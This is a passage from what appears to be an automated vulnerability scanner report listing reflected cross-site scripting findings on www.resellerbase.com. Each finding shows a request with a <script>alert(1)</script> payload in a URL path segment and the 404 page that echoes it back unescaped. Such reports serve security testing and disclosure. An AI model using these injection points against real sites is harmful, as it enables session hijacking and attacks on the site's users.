This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images62251<script>alert(1)</script>1ce671cd2fd/pr/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images62251<script>alert(1)</script>1ce671cd2fd/pr/ was not found on this server.</p>
...[SNIP]...

2.4784. http://www.resellerbase.com/themes/kosmos/images/pr/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/pr/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e9c7e<script>alert(1)</script>31b818d510a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images/pre9c7e<script>alert(1)</script>31b818d510a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images/pre9c7e<script>alert(1)</script>31b818d510a/ was not found on this server.</p>
...[SNIP]...

2.4785. http://www.resellerbase.com/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17c49<script>alert(1)</script>f52bc89c0b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes17c49<script>alert(1)</script>f52bc89c0b8/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes17c49<script>alert(1)</script>f52bc89c0b8/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4786. http://www.resellerbase.com/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 71912<script>alert(1)</script>49375f5983c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos71912<script>alert(1)</script>49375f5983c/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos71912<script>alert(1)</script>49375f5983c/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4787. http://www.resellerbase.com/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12125<script>alert(1)</script>fc54178b8ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images12125<script>alert(1)</script>fc54178b8ba/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images12125<script>alert(1)</script>fc54178b8ba/rating/ was not found on this server.</p>
...[SNIP]...

2.4788. http://www.resellerbase.com/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3408f<script>alert(1)</script>108036b901b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images/rating3408f<script>alert(1)</script>108036b901b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images/rating3408f<script>alert(1)</script>108036b901b/ was not found on this server.</p>
...[SNIP]...

2.4789. http://www.resellerbase.com/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d970<script>alert(1)</script>e64f6ebee4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes9d970<script>alert(1)</script>e64f6ebee4e/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes9d970<script>alert(1)</script>e64f6ebee4e/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4790. http://www.resellerbase.com/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f687<script>alert(1)</script>cb9024e3af1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos3f687<script>alert(1)</script>cb9024e3af1/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos3f687<script>alert(1)</script>cb9024e3af1/images/review/ was not found on this server.</p>
...[SNIP]...

2.4791. http://www.resellerbase.com/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88937<script>alert(1)</script>84867a55710 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images88937<script>alert(1)</script>84867a55710/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images88937<script>alert(1)</script>84867a55710/review/ was not found on this server.</p>
...[SNIP]...

2.4792. http://www.resellerbase.com/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f2c9<script>alert(1)</script>9121620b9ce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images/review8f2c9<script>alert(1)</script>9121620b9ce/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images/review8f2c9<script>alert(1)</script>9121620b9ce/ was not found on this server.</p>
...[SNIP]...

2.4793. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/template_24.gif/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2597<script>alert(1)</script>2cb7da3e76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesd2597<script>alert(1)</script>2cb7da3e76/kosmos/images/template_24.gif/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesd2597<script>alert(1)</script>2cb7da3e76/kosmos/images/template_24.gif/ was not found on this server.</p>
...[SNIP]...

2.4794. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/template_24.gif/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c41b5<script>alert(1)</script>f9c754841ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosc41b5<script>alert(1)</script>f9c754841ca/images/template_24.gif/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosc41b5<script>alert(1)</script>f9c754841ca/images/template_24.gif/ was not found on this server.</p>
...[SNIP]...

2.4795. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/template_24.gif/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1fc7b<script>alert(1)</script>21162949ae4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images1fc7b<script>alert(1)</script>21162949ae4/template_24.gif/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:57:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images1fc7b<script>alert(1)</script>21162949ae4/template_24.gif/ was not found on this server.</p>
...[SNIP]...

2.4796. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/template_24.gif/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcfdf<script>alert(1)</script>187b65f567b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images/template_24.gifdcfdf<script>alert(1)</script>187b65f567b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:57:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images/template_24.gifdcfdf<script>alert(1)</script>187b65f567b/ was not found on this server.</p>
...[SNIP]...

2.4797. http://www.resellerbase.com/themes/kosmos/json.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/json.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3028a<script>alert(1)</script>a124c65a16b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes3028a<script>alert(1)</script>a124c65a16b/kosmos/json.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes3028a<script>alert(1)</script>a124c65a16b/kosmos/json.js was not found on this server.</p>
...[SNIP]...

2.4798. http://www.resellerbase.com/themes/kosmos/json.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/json.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 615ea<script>alert(1)</script>9b183fa9121 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos615ea<script>alert(1)</script>9b183fa9121/json.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos615ea<script>alert(1)</script>9b183fa9121/json.js was not found on this server.</p>
...[SNIP]...

2.4799. http://www.resellerbase.com/themes/kosmos/json.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/json.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5786e<script>alert(1)</script>bbc1a4db582 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/json.js5786e<script>alert(1)</script>bbc1a4db582 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/json.js5786e<script>alert(1)</script>bbc1a4db582 was not found on this server.</p>
...[SNIP]...

2.4800. http://www.resellerbase.com/themes/kosmos/styles.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b6f4<script>alert(1)</script>53f99ec3077 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes3b6f4<script>alert(1)</script>53f99ec3077/kosmos/styles.css HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes3b6f4<script>alert(1)</script>53f99ec3077/kosmos/styles.css was not found on this server.</p>
...[SNIP]...

2.4801. http://www.resellerbase.com/themes/kosmos/styles.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/styles.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5306<script>alert(1)</script>bf0f2de63bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosb5306<script>alert(1)</script>bf0f2de63bb/styles.css HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosb5306<script>alert(1)</script>bf0f2de63bb/styles.css was not found on this server.</p>
...[SNIP]...

2.4802. http://www.resellerbase.com/themes/kosmos/styles.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/styles.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cbb60<script>alert(1)</script>ffbf1428aab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/styles.csscbb60<script>alert(1)</script>ffbf1428aab HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/styles.csscbb60<script>alert(1)</script>ffbf1428aab was not found on this server.</p>
...[SNIP]...

